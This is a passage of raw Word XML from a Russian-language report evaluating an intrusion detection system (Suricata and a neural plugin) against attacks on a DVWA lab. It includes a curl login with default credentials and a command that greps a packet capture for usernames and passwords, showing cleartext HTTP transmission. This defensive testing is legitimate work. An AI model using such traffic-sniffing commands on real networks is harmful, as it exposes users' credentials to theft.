      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C1C481D" w14:textId="77777777" w:rsidR="004C410D" w:rsidRPr="005A1278" w:rsidRDefault="004C410D" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A560A4" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Параллельно выполнялась аутентификация в веб-приложении </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2045352F" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00E32C6A" w:rsidRDefault="000A1CD6" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DB8A54" w14:textId="5A4105F9" w:rsidR="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Curl</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> d </w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>://192.168.0.104/</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14EC7E4D" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA86B79" w14:textId="6F58A816" w:rsidR="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>После остановки перехвата выполнен анализ захваченного трафика:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB2B63" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00E32C6A" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6308C829" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">strings </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>capture.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F01A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "password\|username"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C9795" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRPr="00ED4CBB" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F3C454" w14:textId="36BBB962"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 выполнения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а именно то, что </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">логин и пароль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">передаются </w:t>
      </w:r>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в открытом виде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFB8E3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00E32C6A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2224A54C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85B9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3764A88D" wp14:editId="2BA30071">
            <wp:extent cx="5001323" cy="628738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1848995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95959" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5001323" cy="628738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E61D5D" w14:textId="22008BA4" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Небезопасная передача</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010160F1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF09D3F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00E32C6A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ показал, что учётные данные передаются без шифрования по протоколу HTTP. Нейросетевой плагин и классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32C6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сформировали — перехват трафика является пассивной атакой и не изменяет статистических характеристик сетевых потоков, анализируемых моделью</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CD4D5C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="006A2536" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В рамках разработанного программного комплекса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> так же</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> реализован механизм противодействия данной категории угроз — контроль целостности файлов нейросетевой модели на основе алгоритма SHA-256. При каждом запуске системы вычисляются хеш-суммы файлов модели и сверяются с эталонными </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>значениями. Периодическая автоматическая проверка выполняется каждые 5 минут, что исключает возможность незаметной подмены файлов модели злоумышленником. Для полного закрытия категории A02 на уровне инфраструктуры необходим перевод веб-интерфейса на протокол HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D8EBC"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6A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — 0 срабатываний. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BEA45F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00844957" w:rsidRDefault="008E0171" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B4C75A" w14:textId="00BCE000" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 7. Сбои журналирования и мониторинга </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32507E52" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00687033" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
